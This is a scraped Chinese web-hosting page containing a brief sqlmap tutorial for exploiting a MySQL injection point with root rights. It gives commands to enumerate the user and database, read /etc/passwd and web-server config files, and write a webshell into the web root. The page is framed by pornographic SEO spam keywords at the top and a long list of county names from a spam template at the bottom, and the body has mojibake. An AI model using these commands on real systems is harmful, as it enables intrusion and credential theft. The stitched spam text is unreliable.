欧美一区2区三区4区公司二百,国产精品婷婷午夜在线观看,自拍偷拍亚洲精品,国产美女诱惑一区二区

歡迎來到云服務(wù)器

網(wǎng)絡(luò)技術(shù)

sqlmap注入mysql和到root權(quán)限后怎么樣深入

 碰著一mysql root權(quán)限注入點,實驗用sqlmap進一步滲透獲取更高權(quán)限,東亞服務(wù)器 臺灣服務(wù)器,詳細如下:

判定注入點的當前用戶和當前數(shù)據(jù)庫

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user
./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

 

root權(quán)限注入點可以實驗讀取系統(tǒng)文件,好比/etc/passwd,以及apache,nginx的設(shè)置文件等,相關(guān)設(shè)置文件路徑如下:

nginx: usr/local/nginx/conf/nginx.conf

 

常用的apache設(shè)置文件路徑有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

 

sqlmap讀取文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

假如magic_quotes_gpc=off就可以實驗舉辦寫入Webshell,sqlmap寫入文件語法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-write /test/test.txt --file-dest /var/www/html/1.txt

將當?shù)氐膖est.txt寫入到站點處事器的html目次下。

騰訊云代理

Copyright © 2003-2021 MFISP.COM. 國外vps服務(wù)器租用 夢飛云服務(wù)器租用 版權(quán)所有 ? 粵ICP備11019662號

主站蜘蛛池模板: 察隅县| 镇原县| 景谷| 丹凤县| 通河县| 石棉县| 甘洛县| 荔浦县| 蓝山县| 尉氏县| 辽阳市| 清徐县| 大邑县| 丰城市| 宜兰市| 耒阳市| 阿图什市| 武冈市| 石门县| 健康| 万安县| 旬阳县| 白城市| 新干县| 昌邑市| 盐源县| 盐津县| 陇西县| 绵阳市| 合阳县| 秀山| 蒙阴县| 平邑县| 托克托县| 南陵县| 沛县| 房产| 南漳县| 裕民县| 镇雄县| 康保县|